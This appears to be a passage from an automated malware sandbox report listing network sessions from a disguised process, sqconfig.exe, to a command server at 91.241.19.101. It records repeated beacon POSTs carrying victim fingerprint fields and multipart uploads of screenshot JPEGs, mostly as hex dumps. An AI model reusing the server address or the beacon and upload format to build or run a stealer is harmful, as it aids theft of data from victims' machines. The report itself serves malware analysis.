                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:25 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  104192.168.2.34992491.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:26.167165995 CEST16097OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:26.373274088 CEST16112INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:26 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  105192.168.2.34992591.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:26.337969065 CEST16099OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:26.338105917 CEST16099OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:26.338334084 CEST16109OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:26.338524103 CEST16112OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:26.470480919 CEST16116OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:26.470546961 CEST16119OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:53:26.470642090 CEST16121OUTData Raw: 8e f4 94 53 01 73 4a 0d 36 96 84 c4 3c 35 3d 5b 9a 84 53 85 55 c9 68 9b 20 d0 54 1a 88 1a 50 4d 55 c5 61 c6 15 34 c3 6f e9 52 06 a7 06 a2 c9 8a f2 45 63 0b 0a 69 42 3b 55 de 0d 2e c5 34 b9 10 fd a3 ea 67 91 4a 2a e9 85 4d 30 db 77 14 bd 9b 2b da
                                                                  Data Ascii: SsJ6<5=[SUh TPMUa4oREciB;U.4gJ*M0w+")jC;Rh|b(/4`1K)KE.(N)%q1F)qF)XW1Or2(I1E[hRR1B1Z>bRbF\!!1ZiZ\R!&*R)1SbBVK+)
                                                                  Sep 30, 2021 23:53:26.470787048 CEST16133OUTData Raw: 60 29 db 6a 43 13 0e d4 98 a5 ca c7 cc 33 14 e0 29 71 4b 8a 76 15 c6 e2 94 0a 5c 53 b1 4e c2 b8 dc 51 8a 76 29 71 40 5c 6e 29 71 4e c5 28 15 56 26 e3 71 46 29 f8 a3 14 ec 2b 91 e2 93 6d 4d b6 93 6d 1c a3 e6 21 2b 48 56 a7 2b 4d 2b 53 ca 3e 62 be
                                                                  Data Ascii: `)jC3)qKv\SNQv)q@\n)qN(V&qF)+mMm!+HV+M+S>biJVR2iJWR2J\)L)PhS+M+VS+7E29ZaZHi9_ZaZR"I2S"Ch%%%;bS66:u[xZk[kIFq1L3)<O`V{r
                                                                  Sep 30, 2021 23:53:26.470818043 CEST16138OUTData Raw: a4 9b a9 73 51 66 97 34 5c 56 25 06 96 a1 dd 4e 0d 40 ac 4a 0d 2e 6a 2c d2 83 4c 9b 12 0a b7 ad 1c 78 29 39 ff 00 97 8a a4 0d 59 d5 f9 f0 5e 7f e9 e2 b8 f1 4b 45 ea 75 e1 17 be 78 f5 01 49 65 51 8c 92 00 cd 3b 14 d6 5d ca 47 ad 78 07 d6 1b 5a fc
                                                                  Data Ascii: sQf4\V%N@J.j,Lx)9Y^KEuxIeQ;]GxZny[#6$E8f`\N;|VUR;YO,GC`jV.:K@mq3Ylqf{<U5[Ea5F$P>oKW%~?z.u7M!iJrl
                                                                  Sep 30, 2021 23:53:26.604665041 CEST16144OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:26.604787111 CEST16149OUTData Raw: ef fb 90 fd 57 e6 79 ab 7c 06 d3 36 9d ba 80 2d 8e 01 85 c0 ff 00 d1 95 e5 1e 34 f0 4d ff 00 84 b5 16 8e 54 26 03 ca ba e4 8c 7a 83 dc 7f 93 5f 57 59 5d 25 f5 85 bd dc 60 84 9e 25 95 41 ea 03 00 7f ad 67 78 97 c3 f6 be 23 d2 25 b3 b8 45 2f 82 62
                                                                  Data Ascii: Wy|6-4MT&z_WY]%`%Agx#%E/br>c2=6nx*Kb$S[Gg\CjA ~H!QN*K*5eJ[h:g4U>6Z]3NVts0h,;qqY}h}i
                                                                  Sep 30, 2021 23:53:26.812921047 CEST16188INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:26 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  106192.168.2.34992791.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:26.614981890 CEST16187OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:26.798819065 CEST16188INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:26 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  107192.168.2.34992891.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:27.042021036 CEST16191OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:27.263652086 CEST16205INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:27 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  108192.168.2.34993091.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:27.149794102 CEST16191OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:27.150113106 CEST16191OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:27.150445938 CEST16201OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:27.150677919 CEST16204OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:27.291985989 CEST16216OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:27.292059898 CEST16226OUTData Raw: 59 c1 05 8e 14 12 7b 9c 9c 0a c5 46 aa 76 4f bf e6 d9 ab 95 26 9b 7f d6 df f0 4a 32 f9 0b 73 32 41 2f 9d 0a c8 cb 1c bb 4a ef 50 78 6c 1e 46 47 38 a6 e1 69 8f 2c 93 48 f2 cb 23 49 2b b1 67 77 39 66 27 92 49 ee 68 cd 76 47 64 99 c9 2b 36 da 1d e5
                                                                  Data Ascii: Y{FvO&J2s2A/JPxlFG8i,H#I+gw9f'IhvGd+6HbhNy>y&qh3jBTg;YKjOjp{QJ*;O%OCG#+Rg.VXRvwC(m4;RJQIJ(h()iQK@E.(4XBQK1@RB
                                                                  Sep 30, 2021 23:53:27.292110920 CEST16231OUTData Raw: a4 9b a9 73 51 66 97 34 5c 56 25 06 96 a1 dd 4e 0d 40 ac 4a 0d 2e 6a 2c d2 83 4c 9b 12 0a b7 ad 1c 78 29 39 ff 00 97 8a a4 0d 59 d5 f9 f0 5e 7f e9 e2 b8 f1 4b 45 ea 75 e1 17 be 78 f5 01 49 65 51 8c 92 00 cd 3b 14 d6 5d ca 47 ad 78 07 d6 1b 5a fc
                                                                  Data Ascii: sQf4\V%N@J.j,Lx)9Y^KEuxIeQ;]GxZny[#6$E8f`\N;|VUR;YO,GC`jV.:K@mq3Ylqf{<U5[Ea5F$P>oKW%~?z.u7M!iJrl
                                                                  Sep 30, 2021 23:53:27.433893919 CEST16235OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:27.433932066 CEST16240OUTData Raw: 18 9e 1f 3a 0f ed 1d 3d f5 28 22 32 cb a7 23 b9 9d 00 19 61 9d 9e 59 65 19 25 43 92 30 46 32 08 ac 40 72 b9 15 d8 58 7f 63 cb e2 bb bd 7e cb 5d b4 13 4a 67 ba b6 b0 b9 dd 04 a6 57 07 f7 6f 23 81 0a 80 58 fc db ce 40 e0 64 e0 73 b0 da 68 ea 63 8e
                                                                  Data Ascii: :=("2#aYe%C0F2@rXc~]JgWo#X@dshcMyWWah8>q8g%k)n\S`JS{E%(bQIA (`:6`QKHAKJZ`- 1EAE-RRQEZNQ@Mh$Z(SE-%
                                                                  Sep 30, 2021 23:53:27.434072018 CEST16261OUTData Raw: ad 1e ca 7d 85 ed a1 dc a1 4e e2 af 0d 38 fa d2 8d 38 fa d5 7b 19 76 13 ad 0e e5 0a 2a ff 00 f6 71 f5 a5 fe ce 3e a2 8f 65 2e c1 ed a3 dc a1 4e ab c3 4e 3e b4 e1 a7 1f 5a af 63 2e c4 fb 68 77 33 e9 2b 48 69 a7 d6 97 fb 30 fa d1 ec 66 2f 6f 0e e6
                                                                  Data Ascii: }N88{v*q>e.NN>Zc.hw3+Hi0f/on)kQ4GZOUK>>E<VH_U{)3E_WSdZMav'44e/:zT/b)*V_YG^Ujjs8x@
                                                                  Sep 30, 2021 23:53:27.434154034 CEST16272OUTData Raw: 85 25 e0 9f f9 f3 ba ff 00 c0 a6 ac 7d bc 4d 3d 8c 8f 97 a8 af a6 6f 3e 0b f8 2e 0b 2b 89 92 ce e8 b4 71 33 80 6e 5b 19 03 35 e4 df 11 fe 1c 4f e1 1b b6 bc b1 0f 36 93 23 7c ad d4 c4 7f ba df d0 d5 46 ac 64 ec 4c a9 b4 ae 79 fd 29 a4 a2 b5 20 51
                                                                  Data Ascii: %}M=o>.+q3n[5O6#|FdLy) QEQEQE--%/zbShRf4)(!fG4fiPRQGzZJZJ(PQZZJ;&-QLBGz((E&yAKIE0%-- ( bZJ(i);)
                                                                  Sep 30, 2021 23:53:27.624804974 CEST16281INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:27 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  109192.168.2.34993191.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:27.511879921 CEST16280OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:27.684319019 CEST16281INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:27 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  11192.168.2.34977091.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:52:52.740219116 CEST7413OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:52:52.934003115 CEST7414INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:52:52 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  110192.168.2.34993391.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:27.925472975 CEST16284OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:28.100574017 CEST16298INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:28 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  111192.168.2.34993491.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:27.975248098 CEST16285OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:27.975487947 CEST16285OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:27.975836992 CEST16295OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:27.976056099 CEST16298OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:28.101881027 CEST16301OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:28.101959944 CEST16306OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:53:28.102307081 CEST16321OUTData Raw: 60 29 db 6a 43 13 0e d4 98 a5 ca c7 cc 33 14 e0 29 71 4b 8a 76 15 c6 e2 94 0a 5c 53 b1 4e c2 b8 dc 51 8a 76 29 71 40 5c 6e 29 71 4e c5 28 15 56 26 e3 71 46 29 f8 a3 14 ec 2b 91 e2 93 6d 4d b6 93 6d 1c a3 e6 21 2b 48 56 a7 2b 4d 2b 53 ca 3e 62 be
                                                                  Data Ascii: `)jC3)qKv\SNQv)q@\n)qN(V&qF)+mMm!+HV+M+S>biJVR2iJWR2J\)L)PhS+M+VS+7E29ZaZHi9_ZaZR"I2S"Ch%%%;bS66:u[xZk[kIFq1L3)<O`V{r
                                                                  Sep 30, 2021 23:53:28.102372885 CEST16323OUTData Raw: df 3e 5c b8 f6 35 a1 8a 70 e3 bd 3f 69 35 b3 0f 67 07 ba 30 a5 f0 cc c3 94 60 d5 4e 4d 0e f2 31 fe a8 91 ed 5d 62 96 07 ad 4a 25 71 de ad 62 aa 2f 30 fa bc 1e cc e1 1e ca 78 fe f4 6c 3f 0a 8c a3 2f 63 5e 82 5d 58 7c f1 a9 fc 2a 36 b4 b2 9f ef c0
                                                                  Data Ascii: >\5p?i5g0`NM1]bJ%qb/0xl?/c^]X|*6ZktK7Y2z$l%Jifv#nS09*U**l:(VfgyQf*n=;WJZ+voWU%2#_;TPFye-'i"m RSWL'f
